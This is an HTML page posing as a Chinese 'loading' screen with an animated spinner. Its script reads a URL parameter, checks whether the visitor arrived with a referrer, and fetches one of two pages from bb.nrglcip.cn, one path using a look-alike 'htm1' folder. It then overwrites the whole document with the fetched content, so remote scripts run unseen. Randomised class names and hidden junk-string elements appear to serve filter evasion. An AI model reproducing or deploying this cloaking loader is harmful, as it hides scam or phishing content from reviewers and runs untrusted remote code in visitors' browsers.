<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .z200rlt {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .z200rlt .E2EmF4wCYU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .z200rlt .content {
            line-height: 50px;
            text-align: center
        }

        .z200rlt .img {
            width: 100%
        }

        .z200rlt .Gr7ssxk {
            text-align: center
        }

        .z200rlt .Gr7ssxk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .z200rlt .Gr7ssxk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .z200rlt .Gr7ssxk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .z200rlt .Gr7ssxk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .z200rlt .Gr7ssxk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .z200rlt .Gr7ssxk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .z200rlt .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CnvXy2DSmA(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LbBjAyN = CnvXy2DSmA('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LbBjAyN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LbBjAyN +".html?a=share";
		}
		
        CQw8cNGR=url+"#"+new Date().getTime();
        CQw8cNGR && function() {
            $.get(CQw8cNGR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>z1Nivpc90NHcTaZLNDqVm9psCxowCwZFbyij9svspPQ5gaO2fL7lRoVnjs</a>
<ul style='display:none' >JMxHCxvkIjOmFCvNKrgP1NFEfQRiOvvCcNrof73TPGZZHWfYeeBVkubebvOHdTfuy4Ck3Q5fuZMjAEd</ul>
<span style='display:none'>hLufnYR5Q9isIhmYFWMZRswOAQeRTE2II4UvDyLgYBqOKrBbZjx5TbCgXW8B2er1</span>
<a  href='#' style='display:none'>z1Nivpc90NHcTaZLNDqVm9psCxowCwZFbyij9svspPQ5gaO2fL7lRoVnjs</a>
<span style='display:none'>hLufnYR5Q9isIhmYFWMZRswOAQeRTE2II4UvDyLgYBqOKrBbZjx5TbCgXW8B2er1</span><div class="z200rlt">
    <div class="E2EmF4wCYU">
        <div class="Gr7ssxk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >bKJ8OT7jmedYU2VNyZaohKvHkb6BHvHlNOegxQ639wH97qT1zDyBIe7uWmJQWCB6zn3QyEClSqZ402NnRAjdYaaaVAtlg9</ul>
<li style='display:none' >DMLeGyRXNZFkU98vS8xw7UsJpX9yPO7i</li>
<h1 style='display:none' >ItZYXfmIwEH0sYpjXPfjPMUqWxEem3Z</h1>
<div style='display:none'>r2aOd60sqrtrI1BWfWOYGQV8tuH78UVJ8a3MaZNHSdFckDsrxeNk0W95tg1ZuoZ7</div>
<b style='display:none' >w3blkm2XAFBjn4sN6fFG1BpfsKTWWbFTGvLZWF5DvbM3X7T8</b>
<b style='display:none' >w3blkm2XAFBjn4sN6fFG1BpfsKTWWbFTGvLZWF5DvbM3X7T8</b></body>
</html>